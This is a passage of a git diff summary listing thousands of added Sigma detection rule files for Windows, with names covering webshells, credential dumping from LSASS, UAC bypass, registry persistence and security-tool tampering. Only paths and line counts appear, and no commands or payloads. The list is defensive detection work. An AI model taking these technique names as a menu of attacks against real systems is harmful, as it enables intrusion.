.../proc_creation_win_ultravnc.yml | 29 + ...c_creation_win_ultravnc_susp_execution.yml | 34 + ...ation_win_uninstall_crowdstrike_falcon.yml | 30 + ..._win_userinit_uncommon_child_processes.yml | 56 + .../proc_creation_win_vaultcmd_list_creds.yml | 30 + .../proc_creation_win_verclsid_runs_com.yml | 36 + ...proc_creation_win_virtualbox_execution.yml | 41 + ...n_win_virtualbox_vboxdrvinst_execution.yml | 39 + ...ion_win_vmware_toolbox_cmd_persistence.yml | 36 + ...in_vmware_toolbox_cmd_persistence_susp.yml | 43 + ...win_vmware_vmtoolsd_susp_child_process.yml | 62 + ...n_win_vscode_child_processes_anomalies.yml | 58 + ...c_creation_win_vscode_tunnel_execution.yml | 41 + ...eation_win_vscode_tunnel_remote_shell_.yml | 40 + ...on_win_vscode_tunnel_renamed_execution.yml | 55 + ...tion_win_vscode_tunnel_service_install.yml | 32 + ...tion_win_vsdiagnostics_execution_proxy.yml | 33 + ..._win_vslsagent_agentextensionpath_load.yml | 32 + .../proc_creation_win_w32tm.yml | 35 + ...ab_execution_from_non_default_location.yml | 36 + .../proc_creation_win_wab_unusual_parents.yml | 41 + ...n_win_wbadmin_delete_systemstatebackup.yml | 36 + ...proc_creation_win_webdav_lnk_execution.yml | 39 + .../proc_creation_win_webshell_chopper.yml | 40 + .../proc_creation_win_webshell_hacking.yml | 105 + ..._webshell_recon_commands_and_processes.yml | 107 + ...ll_susp_process_spawned_from_webserver.yml | 92 + .../proc_creation_win_webshell_tool_recon.yml | 57 + ...reation_win_werfault_lsass_shtinkering.yml | 46 + ...ion_win_werfault_reflect_debugger_exec.yml | 34 + ...creation_win_wermgr_susp_child_process.yml | 51 + ...creation_win_wermgr_susp_exec_location.yml | 36 + ...c_creation_win_wget_download_direct_ip.yml | 65 + ...get_download_susp_file_sharing_domains.yml | 91 + ..._creation_win_where_browser_data_recon.yml | 46 + ...proc_creation_win_whoami_all_execution.yml | 34 + .../proc_creation_win_whoami_execution.yml | 32 + ...hoami_execution_from_high_priv_process.yml | 38 + ...c_creation_win_whoami_groups_discovery.yml | 31 + .../proc_creation_win_whoami_output.yml | 37 + ...roc_creation_win_whoami_parent_anomaly.yml | 46 + ...roc_creation_win_whoami_priv_discovery.yml | 33 + ...ion_win_windows_terminal_susp_children.yml | 70 + ..._creation_win_winget_add_custom_source.yml | 38 + ..._win_winget_add_insecure_custom_source.yml | 41 + ...tion_win_winget_add_susp_custom_source.yml | 42 + ..._win_winget_local_install_via_manifest.yml | 42 + ...oc_creation_win_winrar_exfil_dmp_files.yml | 39 + ...creation_win_winrar_susp_child_process.yml | 50 + ...n_win_winrar_uncommon_folder_execution.yml | 40 + .../proc_creation_win_winrm_awl_bypass.yml | 37 + ..._execution_via_scripting_api_winrm_vbs.yml | 36 + ...inrm_remote_powershell_session_process.yml | 33 + ..._creation_win_winrm_susp_child_process.yml | 38 + ...eation_win_winzip_password_compression.yml | 35 + ..._wmi_backdoor_exchange_transport_agent.yml | 33 + ..._wmi_persistence_script_event_consumer.yml | 30 + ...eation_win_wmic_eventconsumer_creation.yml | 33 + ...c_creation_win_wmic_namespace_defender.yml | 32 + ...roc_creation_win_wmic_process_creation.yml | 38 + ...creation_win_wmic_recon_computersystem.yml | 31 + ...proc_creation_win_wmic_recon_csproduct.yml | 31 + .../proc_creation_win_wmic_recon_group.yml | 34 + .../proc_creation_win_wmic_recon_hotfix.yml | 31 + .../proc_creation_win_wmic_recon_process.yml | 36 + .../proc_creation_win_wmic_recon_product.yml | 31 + ..._creation_win_wmic_recon_product_class.yml | 34 + .../proc_creation_win_wmic_recon_service.yml | 37 + ...on_win_wmic_recon_system_info_uncommon.yml | 45 + ...win_wmic_recon_unquoted_service_search.yml | 39 + ...roc_creation_win_wmic_remote_execution.yml | 39 + ...creation_win_wmic_service_manipulation.yml | 35 + ...oc_creation_win_wmic_squiblytwo_bypass.yml | 47 + ...wmic_susp_execution_via_office_process.yml | 69 + ...reation_win_wmic_susp_process_creation.yml | 60 + ...reation_win_wmic_terminate_application.yml | 35 + ...reation_win_wmic_uninstall_application.yml | 35 + ...n_win_wmic_uninstall_security_products.yml | 90 + ...reation_win_wmic_xsl_script_processing.yml | 45 + ...creation_win_wmiprvse_spawning_process.yml | 46 + ...reation_win_wmiprvse_spawns_powershell.yml | 42 + ...tion_win_wmiprvse_susp_child_processes.yml | 69 + ...ation_win_wpbbin_potential_persistence.yml | 28 + ...eation_win_wscript_cscript_script_exec.yml | 42 + ...n_wscript_cscript_susp_child_processes.yml | 55 + ...script_cscript_uncommon_extension_exec.yml | 46 + ...tion_win_wsl_child_processes_anomalies.yml | 55 + ...proc_creation_win_wsl_lolbin_execution.yml | 55 + ...ion_win_wsl_windows_binaries_execution.yml | 28 + .../proc_creation_win_wuauclt_dll_loading.yml | 53 + ...ion_win_wuauclt_no_cli_flags_execution.yml | 33 + ...creation_win_wusa_cab_files_extraction.yml | 26 + ...a_cab_files_extraction_from_susp_paths.yml | 36 + ...reation_win_wusa_susp_parent_execution.yml | 46 + .../proc_tampering_susp_process_hollowing.yml | 40 + ..._susp_disk_access_using_uncommon_tools.yml | 69 + .../registry_add_malware_netwire.yml | 33 + .../registry_add_malware_ursnif.yml | 35 + ...egistry_add_persistence_amsi_providers.yml | 35 + ...gistry_add_persistence_com_key_linking.yml | 35 + ...persistence_disk_cleanup_handler_entry.yml | 69 + ...e_logon_scripts_userinitmprlogonscript.yml | 29 + ...dd_pua_sysinternals_execution_via_eula.yml | 29 + ...ysinternals_renamed_execution_via_eula.yml | 73 + ...a_sysinternals_susp_execution_via_eula.yml | 44 + ...delete_exploit_guard_protected_folders.yml | 28 + .../registry_delete_mstsc_history_cleared.yml | 34 + ...istry_delete_removal_amsi_registry_key.yml | 31 + ...ete_removal_com_hijacking_registry_key.yml | 71 + ...asks_hide_task_via_index_value_removal.yml | 35 + ...chtasks_hide_task_via_sd_value_removal.yml | 33 + .../registry_event_add_local_hidden_user.yml | 32 + .../registry_event_apt_leviathan.yml | 28 + ...registry_event_apt_oceanlotus_registry.yml | 50 + .../registry_event_apt_oilrig_mar18.yml | 46 + .../registry_event_apt_pandemic.yml | 38 + .../registry_event_bypass_via_wsreset.yml | 37 + ...stry_event_cmstp_execution_by_registry.yml | 37 + ...y_events_logging_adding_reg_key_minint.yml | 40 + ...event_disable_wdigest_credential_guard.yml | 33 + ...entutl_volume_shadow_copy_service_keys.yml | 33 + .../registry_event_hack_wce_reg.yml | 31 + ...t_hybridconnectionmgr_svc_installation.yml | 33 + .../registry_event_mal_azorult.yml | 38 + .../registry_event_mal_flowcloud.yml | 34 + ...registry_event_malware_qakbot_registry.yml | 29 + ...gistry_event_mimikatz_printernightmare.yml | 51 + ...y_event_modify_screensaver_binary_path.yml | 36 + ...ry_event_narrator_feedback_persistance.yml | 34 + .../registry_event_net_ntlm_downgrade.yml | 38 + ..._dll_added_to_appcertdlls_registry_key.yml | 41 + ...dll_added_to_appinit_dlls_registry_key.yml | 38 + .../registry_event_office_test_regadd.yml | 30 + ...event_office_trust_record_modification.yml | 35 + ...registry_event_persistence_recycle_bin.yml | 36 + .../registry_event_portproxy_registry_key.yml | 35 + .../registry_event_redmimicry_winnti_reg.yml | 30 + .../registry_event_runkey_winekey.yml | 35 + .../registry_event_runonce_persistence.yml | 40 + ...try_event_shell_open_keys_manipulation.yml | 46 + ...registry_event_silentprocessexit_lsass.yml | 34 + .../registry_event_ssp_added_lsa_config.yml | 36 + ...registry_event_stickykey_like_backdoor.yml | 42 + .../registry_event_susp_atbroker_change.yml | 42 + .../registry_event_susp_download_run_key.yml | 34 + .../registry_event_susp_lsass_dll_load.yml | 39 + .../registry_event_susp_mic_cam_access.yml | 45 + ...gistry_set_enable_anonymous_connection.yml | 27 + ...stry_set_add_load_service_in_safe_mode.yml | 37 + .../registry_set_add_port_monitor.yml | 44 + .../registry_set_aedebug_persistence.yml | 30 + ...et_allow_rdp_remote_assistance_feature.yml | 28 + .../registry_set_amsi_com_hijack.yml | 30 + ...set_asep_reg_keys_modification_classes.yml | 66 + ..._set_asep_reg_keys_modification_common.yml | 79 + ...eg_keys_modification_currentcontrolset.yml | 71 + ...p_reg_keys_modification_currentversion.yml | 150 + ...eg_keys_modification_currentversion_nt.yml | 92 + ...eg_keys_modification_internet_explorer.yml | 58 + ..._set_asep_reg_keys_modification_office.yml | 87 + ..._reg_keys_modification_session_manager.yml | 49 + ...p_reg_keys_modification_system_scripts.yml | 46 + ...et_asep_reg_keys_modification_winsock2.yml | 46 + ...asep_reg_keys_modification_wow6432node.yml | 108 + ..._keys_modification_wow6432node_classes.yml | 54 + ...odification_wow6432node_currentversion.yml | 47 + .../registry_set_bginfo_custom_db.yml | 27 + .../registry_set_bginfo_custom_vbscript.yml | 31 + .../registry_set_bginfo_custom_wmi_query.yml | 31 + .../registry_set_blackbyte_ransomware.yml | 32 + ...y_set_bypass_uac_using_delegateexecute.yml | 31 + ...istry_set_bypass_uac_using_eventviewer.yml | 30 + ...et_bypass_uac_using_silentcleanup_task.yml | 30 + .../registry_set_change_rdp_port.yml | 32 + .../registry_set_change_security_zones.yml | 36 + ...stry_set_change_sysmon_driver_altitude.yml | 29 + ...gistry_set_change_winevt_channelaccess.yml | 39 + .../registry_set_chrome_extension.yml | 136 + .../registry_set_clickonce_trust_prompt.yml | 35 + ...stry_set_cobaltstrike_service_installs.yml | 43 + .../registry_set_comhijack_sdclt.yml | 29 + .../registry_set_crashdump_disabled.yml | 28 + ...istry_set_creation_service_susp_folder.yml | 53 + ...y_set_creation_service_uncommon_folder.yml | 49 + ...file_open_handler_powershell_execution.yml | 30 + ...try_set_cve_2020_1048_new_printer_port.yml | 35 + ...gistry_set_cve_2022_30190_msdt_follina.yml | 28 + ...try_set_dbgmanageddebugger_persistence.yml | 30 + .../registry_set_defender_exclusions.yml | 30 + ...registry_set_desktop_background_change.yml | 52 + ...pervisorenforcedcodeintegrity_disabled.yml | 33 + .../registry_set_dhcp_calloutdll.yml | 32 + ...istry_set_disable_administrative_share.yml | 31 + ...gistry_set_disable_autologger_sessions.yml | 38 + ...registry_set_disable_defender_firewall.yml | 32 + .../registry_set_disable_function_user.yml | 49 + ...stry_set_disable_macroruntimescanscope.yml | 33 + ...et_disable_privacy_settings_experience.yml | 28 + ..._disable_security_center_notifications.yml | 28 + .../registry_set_disable_system_restore.yml | 33 + .../registry_set_disable_uac_registry.yml | 29 + ...y_set_disable_windows_defender_service.yml | 29 + .../registry_set_disable_windows_firewall.yml | 30 + .../registry_set_disable_winevt_logging.yml | 50 + ...it_guard_net_protection_on_ms_defender.yml | 28 + ...t_disabled_microsoft_defender_eventlog.yml | 28 + ...d_pua_protection_on_microsoft_defender.yml | 28 + ...amper_protection_on_microsoft_defender.yml | 33 + .../registry_set_disallowrun_execution.yml | 28 + ...sk_cleanup_handler_autorun_persistence.yml | 53 + .../registry_set_dns_over_https_enabled.yml | 41 + ...gistry_set_dns_server_level_plugin_dll.yml | 34 + .../registry_set_dot_net_etw_tamper.yml | 49 + ...et_enabling_cor_profiler_env_variables.yml | 35 + .../registry_set_enabling_turnoffcheck.yml | 28 + .../registry_set_evtx_file_key_tamper.yml | 30 + ...ry_set_exploit_guard_susp_allowed_apps.yml | 35 + .../registry_set_fax_change_service_user.yml | 30 + .../registry_set_fax_dll_persistance.yml | 32 + .../registry_set_file_association_exefile.yml | 27 + ...egistry_set_hangs_debugger_persistence.yml | 27 + .../registry_set_hhctrl_persistence.yml | 29 + .../registry_set_hidden_extention.yml | 33 + .../registry_set/registry_set_hide_file.yml | 30 + .../registry_set_hide_function_user.yml | 38 + ...t_hide_scheduled_task_via_index_tamper.yml | 37 + ...urity_zone_protocol_defaults_downgrade.yml | 36 + ...registry_set_ime_non_default_extension.yml | 36 + .../registry_set_ime_suspicious_paths.yml | 52 + ...stry_set_install_root_or_ca_certificat.yml | 39 + ...t_explorer_disable_first_run_customize.yml | 36 + .../registry_set_legalnotice_susp_message.yml | 33 + ...y_set_lolbin_onedrivestandaloneupdater.yml | 29 + ...egistry_set_lsa_disablerestrictedadmin.yml | 34 + .../registry_set_lsass_usermode_dumping.yml | 32 + .../registry_set/registry_set_mal_adwind.yml | 31 + .../registry_set_mal_blue_mockingbird.yml | 31 + ...istry_set_net_cli_ngenassemblyusagelog.yml | 30 + ...tsh_help_dll_persistence_susp_location.yml | 53 + ...netsh_helper_dll_potential_persistence.yml | 34 + ...registry_set_new_application_appcompat.yml | 30 + .../registry_set_new_network_provider.yml | 41 + .../registry_set_odbc_driver_registered.yml | 38 + ...gistry_set_odbc_driver_registered_susp.yml | 53 + ...registry_set_office_access_vbom_tamper.yml | 33 + ...office_disable_protected_view_features.yml | 47 + .../registry_set_office_enable_dde.yml | 35 + ...ook_enable_load_macro_provider_on_boot.yml | 32 + ..._office_outlook_enable_macro_execution.yml | 32 + ...utlook_enable_unsafe_client_mail_rules.yml | 34 + ...y_set_office_outlook_security_settings.yml | 33 + ..._set_office_trust_record_susp_location.yml | 40 + ...y_set_office_trusted_location_uncommon.yml | 49 + ...egistry_set_office_vba_warnings_tamper.yml | 33 + ...ce_app_cpmpat_layer_registerapprestart.yml | 30 + .../registry_set_persistence_app_paths.yml | 55 + ...registry_set_persistence_appx_debugger.yml | 32 + .../registry_set_persistence_autodial_dll.yml | 27 + .../registry_set_persistence_chm.yml | 29 + ...rsistence_com_hijacking_susp_locations.yml | 41 + ..._persistence_comhijack_psfactorybuffer.yml | 34 + ...et_persistence_custom_protocol_handler.yml | 39 + ...et_persistence_event_viewer_events_asp.yml | 47 + .../registry_set_persistence_globalflags.yml | 44 + .../registry_set_persistence_ie.yml | 45 + .../registry_set_persistence_ifilter.yml | 76 + ...registry_set_persistence_lsa_extension.yml | 29 + .../registry_set_persistence_mpnotify.yml | 27 + .../registry_set_persistence_mycomputer.yml | 27 + ...istry_set_persistence_natural_language.yml | 37 + .../registry_set_persistence_office_vsto.yml | 50 + ...istry_set_persistence_outlook_homepage.yml | 37 + ...stry_set_persistence_outlook_todaypage.yml | 41 + ...gistry_set_persistence_reflectdebugger.yml | 31 + .../registry_set_persistence_scrobj_dll.yml | 28 + .../registry_set_persistence_search_order.yml | 95 + ...registry_set_persistence_shim_database.yml | 35 + ...istence_shim_database_susp_application.yml | 40 + ...stence_shim_database_uncommon_location.yml | 33 + .../registry_set_persistence_typed_paths.yml | 31 + .../registry_set_persistence_xll.yml | 31 + ...istry_set_policies_associations_tamper.yml | 43 + ...gistry_set_policies_attachments_tamper.yml | 36 + .../registry_set_powershell_as_service.yml | 31 + ...y_set_powershell_enablescripts_enabled.yml | 29 + ...gistry_set_powershell_execution_policy.yml | 46 + .../registry_set_powershell_in_run_keys.yml | 49 + ...gistry_set_powershell_logging_disabled.yml | 37 + ...egistry_set_provisioning_command_abuse.yml | 36 + ...set_renamed_sysinternals_eula_accepted.yml | 61 + .../registry_set_rpcrt4_etw_tamper.yml | 32 + ...stry_set_scr_file_executed_by_rundll32.yml | 36 + .../registry_set_servicedll_hijack.yml | 39 + .../registry_set_services_etw_tamper.yml | 29 + .../registry_set_set_nopolicies_user.yml | 38 + .../registry_set_sip_persistence.yml | 47 + .../registry_set_sophos_av_tamper.yml | 31 + .../registry_set_special_accounts.yml | 33 + ...ry_set_suppress_defender_notifications.yml | 28 + ...registry_set_susp_keyboard_layout_load.yml | 35 + ...y_set_susp_pendingfilerenameoperations.yml | 39 + .../registry_set_susp_printer_driver.yml | 39 + ...stry_set_susp_reg_persist_explorer_run.yml | 35 + .../registry_set_susp_run_key_img_folder.yml | 46 + .../registry_set_susp_service_installed.yml | 41 + .../registry_set_susp_user_shell_folders.yml | 30 + .../registry_set_suspicious_env_variables.yml | 65 + .../registry_set_system_lsa_nolmhash.yml | 34 + .../registry_set_taskcache_entry.yml | 60 + .../registry_set_telemetry_persistence.yml | 54 + ...egistry_set_terminal_server_suspicious.yml | 43 + ...registry_set_terminal_server_tampering.yml | 67 + .../registry_set_timeproviders_dllname.yml | 34 + ...y_set_tls_protocol_old_version_enabled.yml | 29 + .../registry_set_treatas_persistence.yml | 43 + .../registry_set_turn_on_dev_features.yml | 36 + .../registry_set_uac_bypass_eventvwr.yml | 30 + .../registry_set_uac_bypass_sdclt.yml | 33 + .../registry_set_uac_bypass_winsat.yml | 31 + .../registry_set_uac_bypass_wmp.yml | 29 + .../registry_set_vbs_payload_stored.yml | 45 + .../registry_set_wab_dllpath_reg_change.yml | 31 + ..._set_wdigest_enable_uselogoncredential.yml | 30 + .../registry_set_windows_defender_tamper.yml | 66 + ...ry_set_winget_admin_settings_tampering.yml | 30 + ...istry_set_winget_enable_local_manifest.yml | 28 + ...set_winlogon_allow_multiple_tssessions.yml | 32 + .../registry_set_winlogon_notify_key.yml | 30 + .../sysmon/sysmon_config_modification.yml | 28 + .../sysmon_config_modification_error.yml | 38 + .../sysmon_config_modification_status.yml | 34 + .../sysmon/sysmon_file_block_executable.yml | 25 + .../sysmon/sysmon_file_block_shredding.yml | 24 + .../sysmon_file_executable_detected.yml | 25 + ...e_remote_thread_win_powershell_generic.yml | 35 + .../file_delete_win_zone_identifier_ads.yml | 32 + .../file_event_win_dump_file_creation.yml | 29 + ...file_event_win_scheduled_task_creation.yml | 35 + .../file_event_win_susp_binary_dropper.yml | 124 + ...ile_event_win_vscode_tunnel_indicators.yml | 28 + ...file_event_win_webdav_tmpfile_creation.yml | 41 + .../image_load_dll_amsi_uncommon_process.yml | 54 + .../image_load_dll_system_drawing_load.yml | 29 + .../image_load_office_excel_xll_load.yml | 28 + ...ad_wmi_module_load_by_uncommon_process.yml | 64 + ...net_connection_win_dfsvc_suspicious_ip.yml | 56 + ...eated_sysinternals_psexec_default_pipe.yml | 36 + ...roc_access_win_lsass_powershell_access.yml | 36 + ...c_access_win_lsass_susp_source_process.yml | 141 + ..._access_win_lsass_uncommon_access_flag.yml | 115 + .../proc_creation_win_csc_compilation.yml | 34 + .../proc_creation_win_curl_download.yml | 41 + .../proc_creation_win_curl_execution.yml | 33 + .../proc_creation_win_curl_fileupload.yml | 44 + .../proc_creation_win_curl_useragent.yml | 38 + ...roc_creation_win_dfsvc_child_processes.yml | 28 + ..._creation_win_diskshadow_child_process.yml | 41 + ...oc_creation_win_diskshadow_script_mode.yml | 46 + ...oc_creation_win_findstr_password_recon.yml | 40 + .../proc_creation_win_net_quic.yml | 38 + ...roc_creation_win_office_svchost_parent.yml | 39 + ...n_powershell_abnormal_commandline_size.yml | 37 + ...eation_win_powershell_crypto_namespace.yml | 49 + ..._creation_win_powershell_import_module.yml | 44 + ...on_win_regsvr32_dllregisterserver_exec.yml | 59 + ...reation_win_rundll32_dllregisterserver.yml | 43 + ...c_creation_win_susp_compression_params.yml | 42 + ...reation_win_susp_elevated_system_shell.yml | 45 + ...proc_creation_win_susp_event_log_query.yml | 52 + ...win_susp_file_permission_modifications.yml | 58 + .../proc_creation_win_taskkill_execution.yml | 40 + ...oc_creation_win_wmic_recon_system_info.yml | 71 + ...registry_event_scheduled_task_creation.yml | 37 + .../registry_set_office_trusted_location.yml | 39 + ...gistry_set_powershell_crypto_namespace.yml | 49 + .../dns_query_win_possible_dns_rebinding.yml | 48 + ...load_invoke_obfuscation_clip+_services.yml | 32 + ...ke_obfuscation_obfuscated_iex_services.yml | 36 + ...oad_invoke_obfuscation_stdin+_services.yml | 32 + ..._load_invoke_obfuscation_var+_services.yml | 33 + ...voke_obfuscation_via_compress_services.yml | 38 + ...invoke_obfuscation_via_rundll_services.yml | 36 + ..._invoke_obfuscation_via_stdin_services.yml | 32 + ...voke_obfuscation_via_use_clip_services.yml | 32 + ...oke_obfuscation_via_use_mshta_services.yml | 38 + ..._obfuscation_via_use_rundll32_services.yml | 41 + ..._invoke_obfuscation_via_var++_services.yml | 32 + ...tstrike_getsystem_service_installation.yml | 59 + .../driver_load_tap_driver_installation.yml | 28 + ...ript_creation_by_office_using_file_ext.yml | 51 + ...image_load_mimikatz_inmemory_detection.yml | 47 + ..._correlation_apt_silence_downloader_v3.yml | 44 + ..._correlation_apt_turla_commands_medium.yml | 38 + ...tion_dnscat2_powershell_implementation.yml | 40 + ...tion_win_correlation_multiple_susp_cli.yml | 68 + ...orrelation_susp_builtin_commands_recon.yml | 50 + ...d_cmd_and_powershell_spawned_processes.yml | 42 + .../sysmon_non_priv_program_files_move.yml | 37 + ..._party_drivers_exploits_token_stealing.yml | 30 + ...ivilege_escalation_using_rotten_potato.yml | 39 + ...uspicious_werfault_connection_outbound.yml | 49 + .../sysmon_wmi_event_subscription.yml | 31 + .../sysmon_wmi_susp_encoded_scripts.yml | 38 + .../wmi_event/sysmon_wmi_susp_scripting.yml | 50 + 8114 files changed, 203724 insertions(+), 30214 deletions(-) create mode 100644 tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml create mode 100644 tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml create mode 100644 